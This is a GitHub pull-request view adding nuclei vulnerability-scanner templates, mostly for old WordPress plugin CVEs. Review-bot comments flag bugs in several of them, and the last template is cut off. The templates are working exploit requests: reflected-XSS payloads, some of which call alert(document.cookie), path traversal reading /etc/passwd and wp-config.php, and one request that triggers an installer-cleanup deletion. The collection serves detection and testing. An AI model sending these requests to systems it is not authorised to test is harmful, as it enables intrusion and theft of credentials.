Merge pull request #74 from projectdiscovery/master

Updation
patch-1
Dhiyaneshwaran 2021-07-16 01:53:24 +05:30 committed by GitHub
commit 8895e4727c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
47 changed files with 1199 additions and 12 deletions


@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | 401 | vulnerabilities | 225 | exposed-panels | 197 |
| takeovers | 70 | exposures | 114 | technologies | 117 |
| cves | 430 | vulnerabilities | 233 | exposed-panels | 200 |
| takeovers | 70 | exposures | 116 | technologies | 120 |
| misconfiguration | 77 | workflows | 33 | miscellaneous | 27 |
| default-logins | 37 | file | 42 | dns | 10 |
| fuzzing | 10 | helpers | 9 | iot | 18 |
**127 directories, 1505 files**.
**128 directories, 1551 files**.
</td>
</tr>


@ -0,0 +1,27 @@
id: CVE-2011-1669
info:
name: WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)
author: daffainfo
severity: high
description: Directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.
reference: |
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669
- https://www.exploit-db.com/exploits/17119
tags: cve,cve2011,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
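Review bot: `reference: |` makes the field a single literal string whose lines begin with `- `, not a YAML sequence, so any consumer expecting a list gets one blob with embedded dashes. Writing it as a block sequence (`reference:` followed by `- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669` and `- https://www.exploit-db.com/exploits/17119` as indented list items) keeps the same URLs and parses as a list; nuclei may tolerate the string form, so this is a style point. The same `|` form recurs in several other templates added by this commit.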


@ -0,0 +1,30 @@
id: CVE-2011-4618
info:
name: Advanced Text Widget < 2.0.2 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4618
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -0,0 +1,30 @@
id: CVE-2011-4624
info:
name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4624
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -0,0 +1,30 @@
id: CVE-2011-4926
info:
name: Adminimize 1.7.22 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4926
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -0,0 +1,30 @@
id: CVE-2011-5106
info:
name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5106
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -0,0 +1,30 @@
id: CVE-2011-5107
info:
name: Alert Before Your Post <= 0.1.1 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5107
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
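Review bot: The request path contains a `/trunk/` segment (`.../alert-before-your-post/trunk/post_alert.php`), which looks like it was copied from the plugin's SVN repository layout rather than from an installed plugin, where the file would presumably sit at `/wp-content/plugins/alert-before-your-post/post_alert.php`. If the installed layout has no `trunk/` directory the template can never match. Verify against a real install and drop the segment, or add the plain path as a second entry under `path:`.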


@ -0,0 +1,30 @@
id: CVE-2011-5179
info:
name: Skysa App Bar 1.04 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5179
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -0,0 +1,30 @@
id: CVE-2011-5181
info:
name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -0,0 +1,30 @@
id: CVE-2011-5265
info:
name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5265
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -0,0 +1,30 @@
id: CVE-2012-0901
info:
name: YouSayToo auto-publishing 1.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-0901
tags: cve,cve2012,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -0,0 +1,30 @@
id: CVE-2012-2371
info:
name: WP-FaceThumb 0.1 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-2371
tags: cve,cve2012,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%22%3E%3Cimg%2Fsrc%3Dx%20onerror%3Dalert%28123%29%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<img/src=x onerror=alert(123)>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
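Review bot: The only path, `/?page_id=1&pagination_wp_facethumb=...`, hard-codes `page_id=1`, so detection presumably depends on the post with ID 1 existing and rendering the FaceThumb output, while the description names the plugin's own `index.php`, which the request never touches. If the plugin file reflects the parameter directly, a second `path:` entry under the plugin directory would not depend on site content; verify which endpoint actually reflects before adding it. A short `description` note on the `page_id` assumption would help operators interpret misses.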


@ -0,0 +1,30 @@
id: CVE-2012-4273
info:
name: 2 Click Socialmedia Buttons < 0.34 - Reflected Cross Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4273
tags: cve,cve2012,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -0,0 +1,30 @@
id: CVE-2012-4768
info:
name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI.
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4768
tags: cve,cve2012,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/?dlsearch=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -0,0 +1,30 @@
id: CVE-2012-5913
info:
name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php.
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-5913
tags: cve,cve2012,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3CScrIpT%3Ealert%28123%29%3C%2FScrIpT%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<ScrIpT>alert(123)</ScrIpT>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -0,0 +1,30 @@
id: CVE-2013-4117
info:
name: WordPress Plugin Category Grid View Gallery 2.3.1 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4117
tags: cve,cve2013,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -0,0 +1,30 @@
id: CVE-2013-4625
info:
name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4625
tags: cve,cve2013,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3Cscript%3Ealert%28123%29;%3C/script%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123);</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
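Review bot: The request sends `remove=1` together with the XSS payload to `installer.cleanup.php`; if that parameter drives the cleanup routine the file name suggests, every scan also asks the target to delete its installer artifacts, which is a state change a detection template should avoid. Check whether the `package` parameter is reflected without `remove=1` and drop it if so, or state the side effect in `description` so operators can exclude the template from production scans.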


@ -0,0 +1,30 @@
id: CVE-2014-4513
info:
name: ActiveHelper LiveHelp Server 3.1.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Multiple cross-site scripting (XSS) vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2014-4513
tags: cve,cve2014,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%22%3E%3C/textarea%3E%3Cscript%3Ealert%28123%29%3C/script%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
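Review bot: The `EMAIL` and `NAME` parameters carry `alert(document.cookie)` payloads that no matcher checks, since the single body matcher only looks for the `MESSAGE` payload `<script>alert(123)</script>`. Those extra payloads add nothing to detection but read as a cookie-theft attempt in the target's logs and WAF alerts; use the same benign marker everywhere (`EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E`, likewise for `NAME`) or trim the request to the one parameter that is matched. The trailing `&` on the path can go as well.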


@ -0,0 +1,25 @@
id: CVE-2015-1000012
info:
name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)
author: daffainfo
severity: high
reference: |
- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
tags: cve,cve2015,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[0*]:0:0"
part: body
- type: status
status:
- 200
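Review bot: The regex `root:[0*]:0:0` does not match the shadowed passwd line `root:x:0:0:...` found on most Linux targets, because the character class admits only `0` or `*` in the password field, so a successful read of `/etc/passwd` is reported as a miss. Use the form the other LFI templates in this commit use, `root:[x*]:0:0`, or widen it to `root:[x*0]:0:0`. The template also has no `description`; one sentence naming the `url` parameter of `downloadpage.php` would match the sibling templates.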


@ -0,0 +1,25 @@
id: CVE-2015-9480
info:
name: WordPress Plugin RobotCPA 5 - Directory Traversal
author: daffainfo
severity: high
reference: |
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480
- https://www.exploit-db.com/exploits/37252
tags: cve,cve2015,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[0*]:0:0"
part: body
- type: status
status:
- 200
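Review bot: The regex `root:[0*]:0:0` misses the standard `root:x:0:0:...` line, so the traversal succeeds on most Linux hosts but the matcher never fires; use `root:[x*]:0:0` as the other LFI templates in this commit do. The `l=ZmlsZTovLy9ldGMvcGFzc3dk` value is the base64 of `file:///etc/passwd`; a comment stating that, or nuclei's `{{base64('file:///etc/passwd')}}` helper if the runtime supports it, would make the payload reviewable. A `description` is missing as well.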


@ -0,0 +1,25 @@
id: CVE-2016-10956
info:
name: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
author: daffainfo
severity: high
description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php.
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10956
tags: cve,cve2016,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"
- "{{BaseURL}}/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[0*]:0:0"
part: body
- type: status
status:
- 200
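Review bot: The regex `root:[0*]:0:0` will not match `root:x:0:0:...`, which is what `/etc/passwd` contains on nearly every modern Linux system, so both `count_of_send.php` and `csvexport.php` reads go undetected even when they succeed. Change it to `root:[x*]:0:0`, consistent with CVE-2011-1669 and CVE-2019-9618 in the same commit.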


@ -0,0 +1,25 @@
id: CVE-2018-9118
info:
name: WP Background Takeover, Directory Traversal <= 4.1.4
author: 0x_Akoko
severity: high
description: Affected by this vulnerability is an unknown functionality of the file exports/download.php. The manipulation of the argument filename with the input value leads to a directory traversal vulnerability
reference: https://www.exploit-db.com/exploits/44417
tags: wordpress,wp-plugin,lfi,cve,cve2018
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
- "DB_HOST"
- "The base configurations of the WordPress"
part: body
condition: and


@ -4,7 +4,7 @@ info:
author: pussycat0x
severity: high
reference: https://github.com/shi-yang/jnoj/issues/53
tags: cve.cve2019,jnoj,lfi
tags: cve,cve2019,jnoj,lfi
requests:
- raw:


@ -0,0 +1,30 @@
id: CVE-2019-19134
info:
name: Hero Maps Premium < 2.2.3 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: The Hero Maps Premium plugin 2.2.1 and prior for WordPress is prone to unauthenticated XSS via the views/dashboard/index.php p parameter because it fails to sufficiently sanitize user-supplied input - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
reference: https://wpscan.com/vulnerability/d179f7fe-e3e7-44b3-9bf8-aab2e90dbe01
tags: cve,cve2019,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3E%3Csvg//onload=%22alert(123)%22%3E'
matchers-condition: and
matchers:
- type: word
words:
- 'foo"><svg//onload="alert(123)">'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
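Review bot: The `description` ends with an embedded link to wpscan vulnerability `24b83ce5-...`, the same ID this commit uses as the MyPixs (CVE-2015-1000012) reference, while the template's own `reference` points to `d179f7fe-...`; the trailing URL looks like a copy-paste leftover and should be removed from the description. The name says `< 2.2.3` while the description says `2.2.1 and prior`; align both with what the cited advisory states.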


@ -0,0 +1,27 @@
id: CVE-2019-9618
info:
name: WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion (LFI)
author: daffainfo
severity: high
description: The GraceMedia Media Player plugin 1.0 for WordPress allows Local File Inclusion via the cfg parameter.
reference: |
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
- https://seclists.org/fulldisclosure/2019/Mar/26
tags: cve,cve2019,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200


@ -0,0 +1,30 @@
id: CVE-2020-12054
info:
name: Catch Breadcrumb < 1.5.7 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
description: The Catch Breadcrumb plugin before 1.5.4 for WordPress allows Reflected XSS via the s parameter (a search query).
reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4
tags: cve,cve2020,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<img src=x onerror=alert(123);>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
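Review bot: The name says `Catch Breadcrumb < 1.5.7` while the description says `before 1.5.4`; one of the two is wrong and the affected range is what a reader uses to triage a finding. Pick the version the wpscan reference supports and use it in both places, e.g. `name: Catch Breadcrumb < 1.5.4 - Unauthenticated Reflected XSS`.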


@ -0,0 +1,30 @@
id: CVE-2020-17362
info:
name: Nova Lite < 1.3.9 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: search.php in the Nova Lite theme before 1.3.9 for WordPress allows Reflected XSS.
reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4
tags: cve,cve2020,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/?s=%3Cimg%20src%20onerror=alert(123)%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<img src onerror=alert(123)>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
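Review bot: `reference` reuses the wpscan URL `30a83491-...` that the CVE-2020-12054 (Catch Breadcrumb) template in this commit cites, so the Nova Lite entry points at a different product's advisory; replace it with the Nova Lite advisory or at least `https://nvd.nist.gov/vuln/detail/CVE-2020-17362`. The description calls Nova Lite a theme, yet `tags` says `wp-plugin`; the NativeChurch template in this commit uses `wp-theme` for that case, so `tags: cve,cve2020,wordpress,xss,wp-theme` would be consistent.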


@ -0,0 +1,30 @@
id: CVE-2021-24298
info:
name: Simple Giveaways < 2.36.2 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: The method and share GET parameters of the Giveaway pages were not sanitised, validated or escaped before being output back in the pages, thus leading to reflected XSS
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24298
tags: cve,cve2021,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/giveaway/mygiveaways/?share=%3Cscript%3Ealert(123)%3C/script%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -0,0 +1,30 @@
id: CVE-2021-24320
info:
name: Bello WordPress Theme < 1.6.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: The Bello - Directory & Listing WordPress theme before 1.6.0 did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing page, leading to reflected Cross-Site Scripting issues.
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24320
tags: cve,cve2021,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/listing/?listing_list_view=standard13%22%3E%3Cimg%20src%3Dx%20onerror%3D%28alert%29%28123%29%3B%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<img src=x onerror=(alert)(123);>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
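Review bot: The description identifies Bello as a WordPress theme, but `tags` carries `wp-plugin`; use `wp-theme` as the NativeChurch template in this commit does, so theme-only scans select it. The single path also hard-codes the `/listing/` slug, which presumably is configurable per site; a note in `description` that the request assumes the default listing page slug would explain misses on customised installs.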


@ -0,0 +1,30 @@
id: CVE-2021-24335
info:
name: Car Repair Services < 4.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: The Car Repair Services & Auto Mechanic WordPress theme before 4.0 did not properly sanitise its serviceestimatekey search parameter before outputting it back in the page, leading to a reflected Cross-Site Scripting issue
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24335
tags: cve,cve2021,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<img src=x onerror=alert(123);>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
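Review bot: The path `/car1/estimateresult/result` looks like a slug taken from a demo site rather than a stable theme route, so the template presumably matches only installs that happen to use the same page slug; verify the route against a fresh install and document the assumption in `description` if it cannot be generalised. The description calls this a theme while `tags` says `wp-plugin`; `wp-theme` is the tag the NativeChurch template in this commit uses.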


@ -0,0 +1,30 @@
id: CVE-2021-24389
info:
name: FoodBakery < 2.2 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: The WP Foodbakery WordPress plugin before 2.2, used in the FoodBakery WordPress theme before 2.2 did not properly sanitize the foodbakery_radius parameter before outputting it back in the response, leading to an unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability.
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24389
tags: cve,cve2021,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3E%3Cscript%3Eprompt(123)%3C/script%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>prompt(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -1,8 +1,8 @@
id: dead-host-with-cname
info:
name: dead-host-with-cname
author: pdteam
name: Detect Dangling cnames
author: pdteam,nytr0gen
severity: info
tags: dns
@ -21,3 +21,9 @@ dns:
- type: word
words:
- "IN\tCNAME"
extractors:
- type: regex
group: 1
regex:
- "IN\tCNAME\t(.+)"


@ -0,0 +1,29 @@
id: keycloak-openid-config
info:
name: Keycloak openid-config
author: rodnt
severity: info
reference: https://issues.jboss.org/browse/KEYCLOAK-571
tags: keycloak,config
requests:
- method: GET
path:
- "{{BaseURL}}/.well-known/openid-configuration"
- "{{BaseURL}}/auth/realms/master/.well-known/openid-configuration"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'issuer'
- 'authorization_endpoint'
- 'token_endpoint'
- 'userinfo_endpoint'
- 'jwks_uri'
condition: and
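Review bot: The first path, `{{BaseURL}}/.well-known/openid-configuration`, is the standard OIDC discovery endpoint, and the words matched (`issuer`, `authorization_endpoint`, `token_endpoint`, `userinfo_endpoint`, `jwks_uri`) are the standard discovery fields, so every OpenID provider at that host will be reported as a Keycloak finding. Either restrict the template to the realm-specific path or add a Keycloak-specific indicator; Keycloak discovery documents presumably carry a realm path in `issuer`, so a word matcher on `/realms/` would be one candidate, to be confirmed against a real instance. The name and tags should also say whether this is meant as a Keycloak detector or a generic OIDC-discovery exposure check.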


@ -0,0 +1,27 @@
id: exposed-glances-api
info:
name: Exposed Glances API
author: princechaddha
severity: low
description: Glances is a cross-platform system monitoring tool written in Python.
reference: https://nicolargo.github.io/glances/
tags: glances,exposure
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
